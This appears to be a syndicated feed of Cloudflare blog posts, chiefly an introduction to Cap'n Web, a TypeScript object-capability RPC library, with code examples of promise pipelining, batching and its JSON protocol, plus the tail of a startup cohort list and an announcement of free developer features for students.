  • PlaySafe (By Doge Labs): Makes voice-chat communities safer by detecting and blocking harassment in real time

  • Ploton: Helps small businesses grow by building workflows through natural conversation, not complex tools

  • Project Karna: Multimodal, continuous identity for the post-GenAI enterprise

  • Schematic: Simplifies monetization for GTM teams, allowing them to control pricing, packaging, and entitlements without code changes

  • SonicLinker: Turn AI-agent visits into revenue

  • SuiteOp: All-in-one platform to streamline hospitality operations and guest services

  • SuprSend: Multi-channel notification engine for product and platform teams

  • Yara AI: Ethical, memory-rich AI for mental health at scale

  • Zephyr Cloud: Fastest way to go from idea to production

  • Zero Email: AI-native email client that manages your inbox so you don’t have to

We’re excited to see what Cohort #6 accomplishes. Follow @CloudflareDev on X and join our Developer Discord to stay updated on their progress. If you’re a startup interested in joining Workers Launchpad, applications for Cohort #7 are now open.

Cap’n Web: a new RPC system for browsers and web servers

Post Syndicated from Kenton Varda original https://blog.cloudflare.com/capnweb-javascript-rpc-library/

Allow us to introduce Cap’n Web, an RPC protocol and implementation in pure TypeScript.

Cap’n Web is a spiritual sibling to Cap’n Proto, an RPC protocol I (Kenton) created a decade ago, but designed to play nice in the web stack. That means:

  • Like Cap’n Proto, it is an object-capability protocol. (“Cap’n” is short for “capabilities and”.) We’ll get into this more below, but it’s incredibly powerful.

  • Unlike Cap’n Proto, Cap’n Web has no schemas. In fact, it has almost no boilerplate whatsoever. This means it works more like the JavaScript-native RPC system in Cloudflare Workers.

  • That said, it integrates nicely with TypeScript.

  • Also unlike Cap’n Proto, Cap’n Web’s underlying serialization is human-readable. In fact, it’s just JSON, with a little pre-/post-processing.

  • It works over HTTP, WebSocket, and postMessage() out-of-the-box, with the ability to extend it to other transports easily.

  • It works in all major browsers, Cloudflare Workers, Node.js, and other modern JavaScript runtimes.

  • The whole thing compresses (minify+gzip) to under 10 kB with no dependencies.

  • It’s open source under the MIT license.

Cap’n Web is more expressive than almost every other RPC system, because it implements an object-capability RPC model. That means it:

  • Supports bidirectional calling. The client can call the server, and the server can also call the client.

  • Supports passing functions by reference: If you pass a function over RPC, the recipient receives a “stub”. When they call the stub, they actually make an RPC back to you, invoking the function where it was created. This is how bidirectional calling happens: the client passes a callback to the server, and then the server can call it later.

  • Similarly, supports passing objects by reference: If a class extends the special marker type RpcTarget, then instances of that class are passed by reference, with method calls calling back to the location where the object was created.

  • Supports promise pipelining. When you start an RPC, you get back a promise. Instead of awaiting it, you can immediately use the promise in dependent RPCs, thus performing a chain of calls in a single network round trip.

  • Supports capability-based security patterns.

In short, Cap’n Web lets you design RPC interfaces the way you’d design regular JavaScript APIs – while still acknowledging and compensating for network latency.

The best part is, Cap’n Web is absolutely trivial to set up.

A client looks like this:

import { newWebSocketRpcSession } from "capnweb";

// One-line setup.
let api = newWebSocketRpcSession("wss://example.com/api");

// Call a method on the server!
let result = await api.hello("World");

console.log(result);

And here’s a complete Cloudflare Worker implementing an RPC server:

import { RpcTarget, newWorkersRpcResponse } from "capnweb";

// This is the server implementation.
class MyApiServer extends RpcTarget {
  hello(name) {
    return `Hello, ${name}!`
  }
}

// Standard Workers HTTP handler.
export default {
  fetch(request, env, ctx) {
    // Parse URL for routing.
    let url = new URL(request.url);

    // Serve API at `/api`.
    if (url.pathname === "/api") {
      return newWorkersRpcResponse(request, new MyApiServer());
    }

    // You could serve other endpoints here...
    return new Response("Not found", {status: 404});
  }
}

That’s it. That’s the app.

  • You can add more methods to MyApiServer, and call them from the client.

  • You can have the client pass a callback function to the server, and then the server can just call it.

  • You can define a TypeScript interface for your API, and easily apply it to the client and server.

It just works.

Why RPC? (And what is RPC anyway?)

Remote Procedure Calls (RPC) are a way of expressing communications between two programs over a network. Without RPC, you might communicate using a protocol like HTTP. With HTTP, though, you must format and parse your communications as an HTTP request and response, perhaps designed in REST style. RPC systems try to make communications look like a regular function call instead, as if you were calling a library rather than a remote service. The RPC system provides a “stub” object on the client side which stands in for the real server-side object. When a method is called on the stub, the RPC system figures out how to serialize and transmit the parameters to the server, invoke the method on the server, and then transmit the return value back.
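To make the stub idea concrete, here is a minimal sketch of a generic RPC stub. It is not Cap'n Web's implementation. A JavaScript `Proxy` turns any method call into a JSON `{method, args}` message. A hypothetical in-process `Transport` then hands that message to a `dispatch` function, which invokes the real method and serializes the return value. A real system would send the message over HTTP or a WebSocket instead.

```typescript
// Hypothetical transport: sends a JSON request string, resolves with a JSON reply string.
type Transport = (request: string) => Promise<string>;

// Server side: decode the request, invoke the named method, encode the result.
function dispatch(target: Record<string, unknown>, request: string): string {
  const { method, args } = JSON.parse(request) as { method: string; args: unknown[] };
  const fn = target[method];
  if (typeof fn !== "function") {
    return JSON.stringify({ error: `No such method: ${method}` });
  }
  return JSON.stringify({ result: fn.apply(target, args) });
}

// Client side: every property of the stub is a function that performs the remote call.
function makeStub<T extends object>(send: Transport): T {
  return new Proxy({} as T, {
    get(_target, prop) {
      return async (...args: unknown[]) => {
        const reply = JSON.parse(await send(JSON.stringify({ method: String(prop), args })));
        if ("error" in reply) throw new Error(reply.error);
        return reply.result;
      };
    },
  });
}

// Example wiring: the "network" is a direct in-process call to dispatch().
const server = {
  hello(name: string) {
    return `Hello, ${name}!`;
  },
};
const api = makeStub<{ hello(name: string): Promise<string> }>(
  async (req) => dispatch(server, req),
);
api.hello("World").then((result) => console.log(result)); // logs "Hello, World!"
```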

The merits of RPC have been subject to a great deal of debate. RPC is often accused of committing many of the fallacies of distributed computing.

But this reputation is outdated. When RPC was first invented some 40 years ago, async programming barely existed. We did not have Promises, much less async and await. Early RPC was synchronous: calls would block the calling thread waiting for a reply. At best, latency made the program slow. At worst, network failures would hang or crash the program. No wonder it was deemed “broken”.

Things are different today. We have Promise and async and await, and we can throw exceptions on network failures. We even understand how RPCs can be pipelined so that a chain of calls takes only one network round trip. Many large distributed systems you likely use every day are built on RPC. It works.

The fact is, RPC fits the programming model we’re used to. Every programmer is trained to think in terms of APIs composed of function calls, not in terms of byte stream protocols nor even REST. Using RPC frees you from the need to constantly translate between mental models, allowing you to move faster.

When should you use Cap’n Web?

Cap’n Web is useful anywhere you have two JavaScript applications speaking to each other over a network, including client-to-server and microservice-to-microservice scenarios. However, it is particularly well-suited to interactive web applications with real-time collaborative features, as well as to modeling interactions over complex security boundaries.

Cap’n Web is still new and experimental, so for now, a willingness to live on the cutting edge may also be required!

Features, features, features…

Here are some more things you can do with Cap’n Web.

HTTP batch mode

Sometimes a WebSocket connection is a bit too heavyweight. What if you just want to make a quick one-time batch of calls, but don’t need an ongoing connection?

For that, Cap’n Web supports HTTP batch mode:

import { newHttpBatchRpcSession } from "capnweb";

let batch = newHttpBatchRpcSession("https://example.com/api");

let result = await batch.hello("World");

console.log(result);

(The server is exactly the same as before.)

Note that once you’ve awaited an RPC in the batch, the batch is done, and all the remote references received through it become broken. To make more calls, you need to start over with a new batch. However, you can make multiple calls in a single batch:

let batch = newHttpBatchRpcSession("https://example.com/api");

// We can make multiple calls, as long as we await them all at once.
let promise1 = batch.hello("Alice");
let promise2 = batch.hello("Bob");

let [result1, result2] = await Promise.all([promise1, promise2]);

console.log(result1);
console.log(result2);
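One way to picture batch mode is "queue every call made in the same synchronous run of code, then send them together." The sketch below is a hypothetical illustration of that idea and does not use Cap'n Web's wire format or implementation. `BatchClient`, `Call`, and `sendBatch` are invented names, and `sendBatch` stands in for the single HTTP request. Unlike Cap'n Web's batches, this toy can keep being used after a flush.

```typescript
type Call = { method: string; args: unknown[] };
// Hypothetical: one request carrying every queued call, returning one result per call.
type SendBatch = (calls: Call[]) => Promise<unknown[]>;

class BatchClient {
  private queue: Call[] = [];
  private waiters: Array<{ resolve: (v: unknown) => void; reject: (e: unknown) => void }> = [];
  private scheduled = false;
  requestsSent = 0;

  constructor(private readonly sendBatch: SendBatch) {}

  call(method: string, ...args: unknown[]): Promise<unknown> {
    return new Promise((resolve, reject) => {
      this.queue.push({ method, args });
      this.waiters.push({ resolve, reject });
      if (!this.scheduled) {
        this.scheduled = true;
        // Flush after the current synchronous code finishes, so calls made
        // together land in the same request.
        void Promise.resolve().then(() => this.flush());
      }
    });
  }

  private async flush(): Promise<void> {
    const calls = this.queue;
    const waiters = this.waiters;
    this.queue = [];
    this.waiters = [];
    this.scheduled = false;
    this.requestsSent++;
    try {
      const results = await this.sendBatch(calls);
      results.forEach((r, i) => waiters[i].resolve(r));
    } catch (err) {
      waiters.forEach((w) => w.reject(err));
    }
  }
}

// Usage with a fake server that greets each caller.
const client = new BatchClient(async (calls) => calls.map((c) => `Hello, ${c.args[0]}!`));
void Promise.all([client.call("hello", "Alice"), client.call("hello", "Bob")]).then(([a, b]) => {
  console.log(a, b, client.requestsSent); // Hello, Alice! Hello, Bob! 1
});
```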

And that brings us to another feature…

Chained calls (Promise Pipelining)

Here’s where things get magical.

In both batch mode and WebSocket mode, you can make a call that depends on the result of another call, without waiting for the first call to finish. In batch mode, that means you can, in a single batch, call a method, then use its result in another call. The entire batch still requires only one network round trip.

For example, say your API is:

class MyApiServer extends RpcTarget {
  getMyName() {
    return "Alice";
  }

  hello(name) {
    return `Hello, ${name}!`
  }
}

You can do:

let namePromise = batch.getMyName();
let result = await batch.hello(namePromise);

console.log(result);

Notice the initial call to getMyName() returned a promise, but we used the promise itself as the input to hello(), without awaiting it first. With Cap’n Web, this just works: The client sends a message to the server saying: “Please insert the result of the first call into the parameters of the second.”

Or perhaps the first call returns an object with methods. You can call the methods immediately, without awaiting the first promise, like:

let batch = newHttpBatchRpcSession("https://example.com/api");

// Authenticate the API key, returning a Session object.
let sessionPromise = batch.authenticate(apiKey);

// Get the user's name.
let name = await sessionPromise.whoami();

console.log(name);

This works because the promise returned by a Cap’n Web call is not a regular promise. Instead, it’s a JavaScript Proxy object. Any methods you call on it are interpreted as speculative method calls on the eventual result. These calls are sent to the server immediately, telling the server: “When you finish the call I sent earlier, call this method on what it returns.”
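The Proxy idea can be sketched in a few lines. `PipelineRecorder` below is a hypothetical recorder and is not Cap'n Web's code. Each call on a stub appends a "push" whose expression follows the `["pipeline", id, method, args]` shape of the example messages later in this post, then returns a new stub for that push's ID. A stub passed as an argument is encoded as `["pipeline", id]`. Nothing is awaited, so no round trip has happened yet.

```typescript
// Shapes loosely modeled on this post's example messages (an assumption, not the full protocol).
type Push = ["push", unknown];
type Stub = { [method: string]: (...args: unknown[]) => Stub };

// Hidden key used to ask a stub which ID it stands for.
const STUB_ID = Symbol("stubId");

function stubIdOf(value: unknown): number | undefined {
  if (typeof value !== "object" || value === null) return undefined;
  return (value as Record<symbol, number | undefined>)[STUB_ID];
}

class PipelineRecorder {
  readonly messages: Push[] = [];
  private nextPushId = 1; // pushes are numbered 1, 2, 3, ...

  // Stub for ID `id`: 0 is the peer's main interface, n > 0 is the result of push n.
  stub(id: number): Stub {
    return new Proxy({}, {
      get: (_target, prop) =>
        prop === STUB_ID ? id : (...args: unknown[]) => this.record(id, String(prop), args),
    }) as Stub;
  }

  private record(targetId: number, method: string, args: unknown[]): Stub {
    // A stub used as an argument becomes a reference to that earlier result.
    const encoded = args.map((arg) => {
      const ref = stubIdOf(arg);
      return ref === undefined ? arg : ["pipeline", ref];
    });
    this.messages.push(["push", ["pipeline", targetId, method, encoded]]);
    // IDs are assigned in order, so this push's ID is known without waiting for a reply.
    return this.stub(this.nextPushId++);
  }
}

const rec = new PipelineRecorder();
const api = rec.stub(0);
api.hello(api.getMyName()); // nothing is sent or awaited yet
console.log(JSON.stringify(rec.messages));
// [["push",["pipeline",0,"getMyName",[]]],["push",["pipeline",0,"hello",[["pipeline",1]]]]]
```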

Did you spot the security?

This last example shows an important security pattern enabled by Cap’n Web’s object-capability model.

When we call the authenticate() method, after it has verified the provided API key, it returns an authenticated session object. The client can then make further RPCs on the session object to perform operations that require authorization as that user. The server code might look like this:

class MyApiServer extends RpcTarget {
  async authenticate(apiKey) {
    let username = await checkApiKey(apiKey);
    return new AuthenticatedSession(username);
  }
}

class AuthenticatedSession extends RpcTarget {
  constructor(username) {
    super();
    this.username = username;
  }

  whoami() {
    return this.username;
  }

  // ...other methods requiring auth...
}

Here’s what makes this work: It is impossible for the client to “forge” a session object. The only way to get one is to call authenticate(), and have it return successfully.

In most RPC systems, it is not possible for one RPC to return a stub pointing at a new RPC object in this way. Instead, all functions are top-level, and can be called by anyone. In such a traditional RPC system, it would be necessary to pass the API key again to every function call, and check it again on the server each time. Or, you’d need to do authorization outside of the RPC system entirely.

This is a common pain point for WebSockets in particular. Due to the design of the web APIs for WebSocket, you generally cannot use headers nor cookies to authorize them. Instead, authorization must happen in-band, by sending a message over the WebSocket itself. But this can be annoying for RPC protocols, as it means the authentication message is “special” and changes the state of the connection itself, affecting later calls. This breaks the abstraction.

The authenticate() pattern shown above neatly makes authentication fit naturally into the RPC abstraction. It’s even type-safe: you can’t possibly forget to authenticate before calling a method requiring auth, because you wouldn’t have an object on which to make the call. Speaking of type-safety…

TypeScript

If you use TypeScript, Cap’n Web plays nicely with it. You can declare your RPC API once as a TypeScript interface, implement it on the server, and call it on the client:

// Shared interface declaration:
interface MyApi {
  hello(name: string): Promise<string>;
}

// On the client:
let api: RpcStub<MyApi> = newWebSocketRpcSession("wss://example.com/api");

// On the server:
class MyApiServer extends RpcTarget implements MyApi {
  async hello(name: string): Promise<string> {
    return `Hello, ${name}!`;
  }
}

Now you get end-to-end type checking, auto-completed method names, and so on.

Note that, as always with TypeScript, no type checks occur at runtime. The RPC system itself does not prevent a malicious client from calling an RPC with parameters of the wrong type. This is, of course, not a problem unique to Cap’n Web – JSON-based APIs have always had this problem. You may wish to use a runtime type-checking system like Zod to solve this. (Meanwhile, we hope to add type checking based directly on TypeScript types in the future.)
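Here is a dependency-free sketch of such a runtime check. Zod or a similar library would scale better. The method accepts its parameter as `unknown` and narrows it before use. `assertString` and `ValidatedApi` are hypothetical names. In a Cap'n Web server, the class would also extend `RpcTarget`.

```typescript
// Hand-written guard: the `string` annotation alone is erased and never checked at runtime.
function assertString(value: unknown, name: string): asserts value is string {
  if (typeof value !== "string") {
    throw new TypeError(`${name} must be a string, got ${typeof value}`);
  }
}

class ValidatedApi {
  // Typed as `unknown` because a remote caller can send any JSON-compatible value.
  hello(name: unknown): string {
    assertString(name, "name");
    return `Hello, ${name}!`;
  }
}

console.log(new ValidatedApi().hello("World")); // Hello, World!
```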

An alternative to GraphQL?

If you’ve used GraphQL before, you might notice some similarities. One benefit of GraphQL was to solve the “waterfall” problem of traditional REST APIs by allowing clients to ask for multiple pieces of data in one query. For example, instead of making three sequential HTTP calls:

GET /user
GET /user/friends
GET /user/friends/photos

…you can write one GraphQL query to fetch it all at once.

That’s a big improvement over REST, but GraphQL comes with its own tradeoffs:

  • New language and tooling. You have to adopt GraphQL’s schema language, servers, and client libraries. If your team is all-in on JavaScript, that’s a lot of extra machinery.

  • Limited composability. GraphQL queries are declarative, which makes them great for fetching data, but awkward for chaining operations or mutations. For example, you can’t easily say: “create a user, then immediately use that new user object to make a friend request, all in one round trip.”

  • Different abstraction model. GraphQL doesn’t look or feel like the JavaScript APIs you already know. You’re learning a new mental model rather than extending the one you use every day.

How Cap’n Web goes further

Cap’n Web solves the waterfall problem without introducing a new language or ecosystem. It’s just JavaScript. Because Cap’n Web supports promise pipelining and object references, you can write code that looks like this:

let user = api.createUser({ name: "Alice" });
let friendRequest = await user.sendFriendRequest("Bob");

What happens under the hood? Both calls are pipelined into a single network round trip:

  1. Create the user.

  2. Take the result of that call (a new User object).

  3. Immediately invoke sendFriendRequest() on that object.

All of this is expressed naturally in JavaScript, with no schemas, query languages, or special tooling required. You just call methods and pass objects around, like you would in any other JavaScript code.

In other words, GraphQL gave us a way to flatten REST’s waterfalls. Cap’n Web lets us go even further: it gives you the power to model complex interactions exactly the way you would in a normal program, with no impedance mismatch.

But how do we solve arrays?

With everything we’ve presented so far, there’s a critical missing piece to seriously consider Cap’n Web as an alternative to GraphQL: handling lists. Often, GraphQL is used to say: “Perform this query, and then, for every result, perform this other query.” For example: “List the user’s friends, and then for each one, fetch their profile photo.”

In short, we need an array.map() operation that can be performed without adding a round trip.

Cap’n Proto, historically, has never supported such a thing.

But with Cap’n Web, we’ve solved it. You can do:

let user = api.authenticate(token);

// Get the user's list of friends (an array).
let friendsPromise = user.listFriends();

// Do a .map() to annotate each friend record with their photo.
// This operates on the *promise* for the friends list, so does not
// add a round trip.
// (wait WHAT!?!?)
let friendsWithPhotos = friendsPromise.map(friend => {
  return {friend, photo: api.getUserPhoto(friend.id)};
});

// Await the friends list with attached photos -- one round trip!
let results = await friendsWithPhotos;

Wait… How!?

.map() takes a callback function, which needs to be applied to each element in the array. As we described earlier, normally when you pass a function to an RPC, the function is passed “by reference”, meaning that the remote side receives a stub, where calling that stub makes an RPC back to the client where the function was created.

But that is NOT what is happening here. That would defeat the purpose: we don’t want the server to have to round-trip to the client to process every member of the array. We want the server to just apply the transformation server-side.

To that end, .map() is special. It does not send JavaScript code to the server, but it does send something like “code”, restricted to a domain-specific, non-Turing-complete language. The “code” is a list of instructions that the server should carry out for each member of the array. In this case, the instructions are:

  1. Invoke api.getUserPhoto(friend.id).

  2. Return an object {friend, photo}, where friend is the original array element and photo is the result of step 1.

But the application code just specified a JavaScript method. How on Earth could we convert this into the narrow DSL?

The answer is record-replay: On the client side, we execute the callback once, passing in a special placeholder value. The parameter behaves like an RPC promise. However, the callback is required to be synchronous, so it cannot actually await this promise. The only thing it can do is use promise pipelining to make pipelined calls. These calls are intercepted by the implementation and recorded as instructions, which can then be sent to the server, where they can be replayed as needed.

And because the recording is based on promise pipelining, which is what the RPC protocol itself is designed to represent, it turns out that the “DSL” used to represent “instructions” for the map function is just the RPC protocol itself. 🤯
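Record-replay can be illustrated with a self-contained toy. This is not Cap'n Web's instruction format. The toy only supports reading properties of the element and calling methods on a hypothetical `api`, which it passes into the callback as a second argument instead of capturing it. `record()` runs the callback once against `Proxy` placeholders and logs each operation. `replay()` then re-executes that log for each real array element.

```typescript
// Toy instruction set (hypothetical). Value #0 is the array element;
// instruction i produces value #(i + 1).
type Instr =
  | { op: "get"; from: number; prop: string } // read values[from][prop]
  | { op: "call"; method: string; args: number[] }; // api[method](...values[args])
type Recording = { instrs: Instr[]; template: Record<string, number> };
type Placeholder = { [key: string]: Placeholder };
type RecordingApi = Record<string, (...args: Placeholder[]) => Placeholder>;

const REF = Symbol("ref");

function refOf(v: unknown): number {
  const r = (v as Record<symbol, number | undefined>)[REF];
  if (r === undefined) throw new Error("only placeholders can be used here");
  return r;
}

// Client side: run the callback once against placeholders and log what it does.
function record(callback: (elem: Placeholder, api: RecordingApi) => Record<string, Placeholder>): Recording {
  const instrs: Instr[] = [];
  const placeholder = (id: number): Placeholder =>
    new Proxy({}, {
      get: (_t, prop) => {
        if (prop === REF) return id;
        instrs.push({ op: "get", from: id, prop: String(prop) });
        return placeholder(instrs.length);
      },
    }) as Placeholder;
  const api = new Proxy({}, {
    get: (_t, method) => (...args: Placeholder[]) => {
      instrs.push({ op: "call", method: String(method), args: args.map(refOf) });
      return placeholder(instrs.length);
    },
  }) as RecordingApi;

  const result = callback(placeholder(0), api);
  const template: Record<string, number> = {};
  for (const key of Object.keys(result)) template[key] = refOf(result[key]);
  return { instrs, template };
}

// Server side: replay the recorded instructions against one real element.
function replay(
  rec: Recording,
  elem: unknown,
  api: Record<string, (...args: unknown[]) => unknown>,
): Record<string, unknown> {
  const values: unknown[] = [elem];
  for (const ins of rec.instrs) {
    values.push(
      ins.op === "get"
        ? (values[ins.from] as Record<string, unknown>)[ins.prop]
        : api[ins.method](...ins.args.map((i) => values[i])),
    );
  }
  const out: Record<string, unknown> = {};
  for (const key of Object.keys(rec.template)) out[key] = values[rec.template[key]];
  return out;
}

// Mirrors the post's callback; `api` is passed in explicitly for simplicity.
const recorded = record((friend, api) => ({ friend, photo: api.getUserPhoto(friend.id) }));

// Hypothetical server-side data and photo lookup.
const serverApi = { getUserPhoto: (id: unknown) => `photo-${id}.jpg` };
const friends = [{ id: 1, name: "Bob" }, { id: 2, name: "Carol" }];
console.log(friends.map((f) => replay(recorded, f, serverApi)));
```

The callback runs exactly once on the client, no matter how long the real array turns out to be. The server only ever sees the recorded instructions.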

Implementation details

JSON-based serialization

Cap’n Web’s underlying protocol is based on JSON – but with a preprocessing step to handle special types. Arrays are treated as “escape sequences” that let us encode other values. For example, JSON does not have an encoding for Date objects, but Cap’n Web does. You might see a message that looks like this:

{
  "event": "Birthday Week",
  "timestamp": ["date", 1758499200000]
}

To encode a literal array, we simply double-wrap it in []:

{
  "names": [["Alice", "Bob", "Carol"]]
}

In other words, an array whose only element is itself an array evaluates to that inner array, taken literally. An array whose first element is a type name evaluates to an instance of that type, where the remaining elements are parameters to the type.

Note that only a fixed set of types is supported: essentially, “structured-cloneable” types and RPC stub types.
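The escape convention is simple enough to sketch. `encode` and `decode` below are hypothetical helpers that cover only the cases described above: `Date` values and literal arrays, plus plain objects and primitives. Cap'n Web's real serializer handles more types, including RPC stubs.

```typescript
// Encode: Dates become ["date", ms]; every literal array is wrapped in one extra array.
function encode(value: unknown): unknown {
  if (value instanceof Date) return ["date", value.getTime()];
  if (Array.isArray(value)) return [value.map(encode)];
  if (value !== null && typeof value === "object") {
    const out: Record<string, unknown> = {};
    for (const key of Object.keys(value)) out[key] = encode((value as Record<string, unknown>)[key]);
    return out;
  }
  return value; // strings, numbers, booleans, and null pass through unchanged
}

// Decode: [[...]] is a literal array; ["typename", ...params] is a typed value.
function decode(value: unknown): unknown {
  if (Array.isArray(value)) {
    if (value.length === 1 && Array.isArray(value[0])) return value[0].map(decode);
    if (value[0] === "date" && typeof value[1] === "number") return new Date(value[1]);
    throw new Error(`Unsupported escape: ${JSON.stringify(value)}`);
  }
  if (value !== null && typeof value === "object") {
    const out: Record<string, unknown> = {};
    for (const key of Object.keys(value)) out[key] = decode((value as Record<string, unknown>)[key]);
    return out;
  }
  return value;
}

const wire = JSON.stringify(encode({ event: "Birthday Week", timestamp: new Date(1758499200000) }));
console.log(wire); // {"event":"Birthday Week","timestamp":["date",1758499200000]}
```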

On top of this basic encoding, we define an RPC protocol inspired by Cap’n Proto – but greatly simplified.

RPC protocol

Since Cap’n Web is a symmetric protocol, there is no well-defined “client” or “server” at the protocol level. There are just two parties exchanging messages across a connection. Every kind of interaction can happen in either direction.

In order to make it easier to describe these interactions, I will refer to the two parties as “Alice” and “Bob”.

Alice and Bob start the connection by establishing some sort of bidirectional message stream. This may be a WebSocket, but Cap’n Web also allows applications to define their own transports. Each message in the stream is JSON-encoded, as described earlier.

Alice and Bob each maintain some state about the connection. In particular, each maintains an “export table”, describing all the pass-by-reference objects they have exposed to the other side, and an “import table”, describing the references they have received. Alice’s exports correspond to Bob’s imports, and vice versa. Each entry in the export table has a signed integer ID, which is used to reference it. You can think of these IDs like file descriptors in a POSIX system. Unlike file descriptors, though, IDs can be negative, and an ID is never reused over the lifetime of a connection.

At the start of the connection, Alice and Bob each populate their export tables with a single entry, numbered zero, representing their “main” interfaces. Typically, when one side is acting as the “server”, they will export their main public RPC interface as ID zero, whereas the “client” will export an empty interface. However, this is up to the application: either side can export whatever they want.

From there, new exports are added in two ways:

  • When Alice sends a message to Bob that contains within it an object or function reference, Alice adds the target object to her export table. IDs assigned in this case are always negative, starting from -1 and counting downwards.

  • Alice can send a “push” message to Bob to request that Bob add a value to his export table. The “push” message contains an expression which Bob evaluates, exporting the result. Usually, the expression describes a method call on one of Bob’s existing exports – this is how an RPC is made. Each “push” is assigned a positive ID on the export table, starting from 1 and counting upwards. Since positive IDs are only assigned as a result of pushes, Alice can predict the ID of each push she makes, and can immediately use that ID in subsequent messages. This is how promise pipelining is achieved.
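The ID rules can be condensed into a small bookkeeping class. `ExportTable` is a hypothetical sketch of one side's table, not the library's internals. ID 0 holds the main interface. References this side sends out get -1, -2, and so on. Results of pushes from the peer are stored at 1, 2, and so on. Because the peer can count its own pushes, it can predict each ID without waiting for a reply.

```typescript
// One side's export table (hypothetical sketch). IDs are never reused.
class ExportTable {
  private readonly entries = new Map<number, unknown>();
  private nextNegative = -1; // references this side embeds in outgoing messages
  private nextPositive = 1; // results of "push" messages received from the peer

  constructor(main: unknown) {
    this.entries.set(0, main); // ID 0: this side's main interface
  }

  // An outgoing message passes an object or function by reference.
  exportReference(target: unknown): number {
    const id = this.nextNegative--;
    this.entries.set(id, target);
    return id;
  }

  // The peer pushed an expression; its evaluated result gets the next positive ID.
  recordPush(result: unknown): number {
    const id = this.nextPositive++;
    this.entries.set(id, result);
    return id;
  }

  get(id: number): unknown {
    if (!this.entries.has(id)) throw new Error(`No export with ID ${id}`);
    return this.entries.get(id);
  }
}

// Alice only counts her own pushes to know which IDs Bob will assign.
let alicePushCount = 0;
const predictedId = ++alicePushCount; // 1, before anything is sent
const bobExports = new ExportTable({ hello: (name: string) => `Hello, ${name}!` });
const assignedId = bobExports.recordPush("Alice"); // Bob stores the first push's result
console.log(predictedId === assignedId); // true
```

Keeping the two numbering spaces disjoint means an ID alone tells either side whether it names a pushed result or a passed reference.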

After sending a push message, Alice can subsequently send a “pull” message, which tells Bob that once he is done evaluating the “push”, he should proactively serialize the result and send it back to Alice, as a “resolve” (or “reject”) message. However, this is optional: Alice may not actually care to receive the return value of an RPC, if Alice only wants to use it in promise pipelining. In fact, the Cap’n Web implementation will only send a “pull” message if the application has actually awaited the returned promise.

Putting it together, a code sequence like this:

let namePromise = api.getMyName();
let result = await api.hello(namePromise);

Might produce a message exchange like this:

// Call api.getMyName(). `api` is the server's main export, so has export ID 0.
-> ["push", ["pipeline", 0, "getMyName", []]]
// Call api.hello(namePromise). `namePromise` refers to the result of the first push,
// so has ID 1.
-> ["push", ["pipeline", 0, "hello", [["pipeline", 1]]]]
// Ask that the result of the second push be proactively serialized and returned.
-> ["pull", 2]
// Server responds.
<- ["resolve", 2, "Hello, Alice!"]

For more details about the protocol, check out the docs.
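To tie the messages together, here is a toy version of the server side processing exactly the exchange above. `ToyPeer` is hypothetical and much simpler than the real protocol. It evaluates each push synchronously, understands only the `["pipeline", id]` and `["pipeline", id, method, args]` forms, and never sends "reject".

```typescript
type Message = [string, ...unknown[]];

class ToyPeer {
  private readonly exports = new Map<number, unknown>();
  private nextPushId = 1;
  readonly outbox: Message[] = [];

  constructor(main: object) {
    this.exports.set(0, main); // export ID 0 is the main interface
  }

  // ["pipeline", id] names an export; ["pipeline", id, method, args] calls a method on it.
  private evaluate(expr: unknown): unknown {
    if (!Array.isArray(expr) || expr[0] !== "pipeline") return expr; // plain value
    const target = this.exports.get(expr[1]);
    if (expr.length === 2) return target;
    const args = (expr[3] as unknown[]).map((arg) => this.evaluate(arg));
    const method = (target as Record<string, (...a: unknown[]) => unknown>)[expr[2]];
    return method.apply(target, args);
  }

  receive(msg: Message): void {
    if (msg[0] === "push") {
      // Each push's result is stored at the next positive ID.
      this.exports.set(this.nextPushId++, this.evaluate(msg[1]));
    } else if (msg[0] === "pull") {
      // Send the already-evaluated result back to the caller.
      const id = msg[1] as number;
      this.outbox.push(["resolve", id, this.exports.get(id)]);
    }
  }
}

const bob = new ToyPeer({
  getMyName: () => "Alice",
  hello: (name: string) => `Hello, ${name}!`,
});
bob.receive(["push", ["pipeline", 0, "getMyName", []]]);
bob.receive(["push", ["pipeline", 0, "hello", [["pipeline", 1]]]]);
bob.receive(["pull", 2]);
console.log(JSON.stringify(bob.outbox)); // [["resolve",2,"Hello, Alice!"]]
```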

Try it out!

Cap’n Web is new and still highly experimental. There may be bugs to shake out. But, we’re already using it today. Cap’n Web is the basis of the recently-launched “remote bindings” feature in Wrangler, allowing a local test instance of workerd to speak RPC to services in production. We’ve also begun to experiment with it in various frontend applications – expect more blog posts on this in the future.

In any case, Cap’n Web is open source, and you can start using it in your own projects now.

Check it out on GitHub.


Introducing free access to Cloudflare developer features for students

Post Syndicated from Veronica Marin original https://blog.cloudflare.com/workers-for-students/

I can recall countless late nights as a student spent building out ideas that felt like breakthroughs. My own thesis had significant costs associated with the tools and computational resources I needed. The reality for students is that turning ideas into working applications often requires production-grade tools, and having to pay for them can stop a great project before it even starts. We don’t think that cost should stand in the way of building out your ideas.

Cloudflare’s Developer Platform already makes it easy for anyone to go from idea to launch. It gives you all the tools you need in one place to work on that class project, build out your portfolio, and create full-stack applications. We want students to be able to use these tools without worrying about the cost, so starting today, students at least 18 years old in the United States with a verified .edu email can receive 12 months of free access to Cloudflare’s developer features. This is the first step for Cloudflare for Students, and we plan to continue expanding our support for the next generation of builders.


What’s included

12 months of our paid developer features plan at no upfront cost

Eligible student accounts will receive increased usage allotments for our developer features compared to our free plan. That includes Workers, Pages Functions, KV, Containers, Vectorize, Hyperdrive, Durable Objects, Workers Logpush, and Queues. With these, you can build everything from APIs and full-stack apps to data pipelines and websites.

After 12 months, you can easily renew your subscription by upgrading to our Workers Paid plan. If you choose not to, your account will automatically revert to the free plan, and you won’t be charged.

Here’s a look at the increased usage allotments students can receive today. Above those free allotments, our standard usage rates will apply.

| Product | Free Plan | Student Accounts (Paid developer features) |
|---|---|---|
| Workers | 100,000 requests/day | 10 million requests/month, + $0.30 per additional million requests |
| Workers KV | 100,000 read operations/day; 1,000 write, delete, and list operations/day | 10 million read operations/month; 1 million write, delete, and list operations/month |
| Hyperdrive | 100,000 database queries/day | Unlimited database queries/day |
| Durable Objects | 100,000 requests/day | 1 million requests/day, + $0.15 per additional million requests |
| Workers Logs | 200,000 log events/day, 3 days of retention | 20 million log events/month, 7 days of retention, + $0.60 per additional million events |
| Workers Logpush | Not included | 10 million log events/month, + $0.05 per additional million log events |
| Queues | Not included | 1 million operations/month, + $0.40 per additional million operations |
